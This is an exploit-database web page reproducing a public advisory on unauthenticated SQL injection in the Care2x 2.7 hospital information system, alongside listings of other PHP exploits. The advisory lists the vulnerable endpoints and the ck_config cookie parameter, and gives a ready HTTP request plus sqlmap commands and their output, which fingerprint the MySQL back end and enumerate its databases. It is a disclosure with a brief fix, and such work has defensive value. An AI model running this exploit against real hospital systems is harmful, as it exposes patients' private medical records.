Menu

Improved exploit search engine. Try it out

"Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection"

Author

"Carlos Avila"

Platform

php

Release date

2019-01-28

Release Date Title Type Platform Author
2019-04-22 "UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-22 "Msvod 10 - Cross-Site Request Forgery (Change User Information)" webapps php ax8
2019-04-22 "74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)" webapps php ax8
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2019-04-16 "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion" webapps php "Haboob Team"
2019-04-15 "DirectAdmin 1.561 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-04-15 "CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-12 "ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)" webapps php AkkuS
2019-04-10 "Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution" webapps php "Julien Ahrens"
2019-04-09 "Ashop Shopping Cart Software - 'bannedcustomers.php?blacklistitemid' SQL Injection" webapps php "Doğukan Karaciğer"
2019-02-27 "PHP 7.2 - 'imagecolormatch()' Out of Band Heap Write" remote php cfreal
2019-04-08 "WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass" webapps php isdampe
2019-04-08 "Tradebox CryptoCurrency - 'symbol' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-08 "ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities" webapps php Ramikan
2019-04-08 "Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution" webapps php FelipeGaspar
2019-04-08 "Jobgator - 'experience' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-05 "WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery" webapps php "Peyman Forouzan"
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-04 "FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)" webapps php "Yilmaz Degirmenci"
2019-04-03 "PhreeBooks ERP 5.2.3 - Arbitrary File Upload" webapps php "Abdullah Çelebi"
2019-04-03 "Ashop Shopping Cart Software - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "Clinic Pro v4 - 'month' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-03 "iScripts ReserveLogic - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)" remote php AkkuS
2019-04-02 "phpFileManager 1.7.8 - Local File Inclusion" webapps php "Murat Kalafatoglu"
2019-04-02 "Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting" webapps php "Mr Winst0n"
2019-04-02 "CMS Made Simple < 2.2.10 - SQL Injection" webapps php "Daniele Scanu"
2019-04-02 "LimeSurvey < 3.16 - Remote Code Execution" webapps php q3rv0
2019-04-02 "WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering" webapps php "Vikas Chaudhary"
2019-04-02 "Inout RealEstate - 'city' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
Release Date Title Type Platform Author
2019-02-21 "C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection" webapps php "Carlos Avila"
2019-01-28 "Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection" webapps php "Carlos Avila"
2018-11-06 "LibreHealth 2.0.0 - Arbitrary File Actions" webapps php "Carlos Avila"
2018-09-07 "Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal" webapps php "Carlos Avila"
2018-09-07 "MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection" webapps php "Carlos Avila"
2018-07-11 "Dicoogle PACS 2.5.0 - Directory Traversal" webapps multiple "Carlos Avila"
2018-01-28 "PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection" webapps php "Carlos Avila"
2018-01-28 "PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal" webapps php "Carlos Avila"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46268/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46268/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46268/40745/care2x-27-his-hospital-information-system-multiple-sql-injection/download/", "exploit_id": "46268", "exploit_description": "\"Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection\"", "exploit_date": "2019-01-28", "exploit_author": "\"Carlos Avila\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# Exploit Title: Care2x 2.7  (HIS) Hospital Information system - Multiples SQL Injection
# Date: 01/17/2019
# Software Links/Project: https://github.com/care2x/care2x | http://www.care2x.org/
# Version: Care2x 2.7
# Exploit Author: Carlos Avila
# Category: webapps
# Tested on: Windows 8.1 / Ubuntu Linux
# Contact: http://twitter.com/badboy_nt

1. Description
  
Care2x is PHP based Hospital Information system, It features complete clinical flow management, laboratory management, patient records, multi-user support with permissions, stock management and accounting and billing management, PACS integration and DICOM viewer. Care2x provides some other features as CCTV integration which has not been seen in other open source HIS.

This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin or users valid credentials aren't required. In a deeper analysis other pages are also affected with the vulnerability over the same input.

It written in PHP version 5.x, it is vulnerable to SQL Injection. The parameter on cookie 'ck_config' is vulnerable on multiples URLS occurrences, explains to continue:

http://192.168.0.108/main/login.php [parameter affected: ck_config cookie] (without authentication)


	/main/indexframe.php [parameter affected: ck_config cookie]
	/main/op-doku.php [parameter affected: ck_config cookie]
	/main/spediens.php [parameter affected: ck_config cookie]
	/modules/ambulatory/ambulatory.php [parameter affected: ck_config cookie]
	/modules/fotolab/fotolab_pass.php [parameter affected: ck_config cookie]
	/modules/laboratory/labor.php [parameter affected: ck_config cookie]
	/modules/med_depot/medlager.php [parameter affected: ck_config cookie]
	/modules/news/headline-read.php [parameter affected: nr parameter]
	/modules/news/newscolumns.php [parameter affected: dept_nr parameter]
	/modules/news/start_page.php [parameter affected: sid cookie]
	/modules/nursing/nursing-fastview.php [parameter affected: ck_config cookie]
	/modules/nursing/nursing-fastview.php [parameter affected: currYear parameter]
	/modules/nursing/nursing-patient-such-start.php [parameter affected: ck_config cookie]
	/modules/nursing/nursing-schnellsicht.php [parameter affected: ck_config cookie]
	/modules/registration_admission/patient_register_pass.php [parameter affected: ck_config cookie]


2. Proof of Concept

GET /main/login.php?ntid=false&lang=en HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/main/indexframe.php?boot=1&mask=&lang=en&cookie=&sid=6fclqapl9gsjhrcgoh3q0la5sp
Connection: close
Cookie: sid=6fclqapl9gsjhrcgoh3q0la5sp; ck_sid6fclqapl9gsjhrcgoh3q0la5sp=m14AAA%3D%3D%23WVUYpUnF%2Fo28ZWY45A5Sh9HMvr%2FZ8wVabFY%3D; ck_config=CFG5c414492459f90.28518700%201547781266
Upgrade-Insecure-Requests: 1


root@kali19:~#sqlmap -r SQLI-CARE2X --dbms mysql -f -v 2 --level 3 -p ck_config


[14:18:15] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:18:15] [INFO] testing MySQL
[14:18:16] [INFO] confirming MySQL
[14:18:19] [INFO] the back-end DBMS is MySQL
[14:18:19] [INFO] actively fingerprinting MySQL
[14:18:20] [INFO] executing MySQL comment injection fingerprint
[14:18:33] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.24


root@kali19:~#sqlmap -r SQLI-CARE2X --dbms mysql -v 2 --level 3 -p ck_config --dbs

[20:09:33] [INFO] fetching database names
[20:09:33] [INFO] the SQL query used returns 4 entries
[20:09:33] [INFO] retrieved: information_schema
[20:09:33] [INFO] retrieved: care2x
[20:09:33] [DEBUG] performed 10 queries in 0.20 seconds
available databases [2]:
[*] care2x
[*] information_schema
[*] performance_schema
[*] mysql



3. Solution:

Application inputs must be validated correctly in all developed classes.